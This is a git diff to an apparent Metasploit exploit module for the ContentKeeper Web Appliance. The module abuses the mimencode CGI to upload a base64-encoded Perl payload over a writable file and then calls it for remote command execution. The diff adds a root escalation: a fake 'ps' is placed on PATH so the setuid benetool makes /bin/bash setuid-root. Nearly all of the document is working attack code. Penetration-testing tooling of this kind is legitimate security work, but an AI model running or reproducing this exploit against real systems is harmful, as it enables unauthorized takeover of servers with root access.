diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 6e4d65519b..750706822c 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -22,9 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses - to enable remote command execution as the Apache user. Following exploitation - it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool' - to escalate to root. + to enable remote command execution as the Apache user. By setting + SkipEscalation to false, this module will attempt to setuid the bash shell. }, 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_CMD ], @@ -32,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - [ 'OSVDB', '54551'], - [ 'OSVDB', '54552'], + [ 'OSVDB', '54551' ], + [ 'OSVDB', '54552' ], [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], ], 'Privileged' => false, @@ -44,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Compat' => { 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl ruby telnet', + 'RequiredCmd' => 'generic perl telnet', } }, 'Platform' => ['unix'], @@ -58,6 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(80), + OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']), + OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]), ],self.class) end @@ -77,31 +78,48 @@ class Metasploit3 < Msf::Exploit::Remote exp = "#!/usr/bin/perl\n" exp << "print \"Content-type: text/html\\n\\n\"\;\n\n" - exp << "system(\"" - exp << payload.encoded.gsub('"', '\"') - exp << "\");\n" + exp << "use IO::Socket::INET;\n" + + if (datastore['PAYLOAD'] =~ /perl/) + if not datastore['SkipEscalation'] + print_status("Attempting to facilitate root escalation...") + exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine. + end + exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script! + else + exp << "system(\"" + exp << payload.encoded.gsub('"', '\"') + exp << "\");\n" + end body = Rex::Text.encode_base64(exp) connect - sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n" + sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n" sploit << "Host: #{datastore['RHOST']}\r\n" sploit << "Content-Length: #{body.length}\r\n\r\n" - print_status("Uploading payload to target.") + print_status("Uploading payload to target...") sock.put(sploit + body + "\r\n\r\n") disconnect - select(nil,nil,nil,5) + select(nil,nil,nil,3) # Wait a few seconds.. print_status("Calling payload...") connect - req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx + req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx req << "Host: #{datastore['RHOST']}\r\n" sock.put(req + "\r\n\r\n") - handler + handler disconnect + select(nil,nil,nil,3) # Wait for session creation. + if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/ + print_status("Privilege escalation appears to have worked!") + print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.") + print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).") + end + end end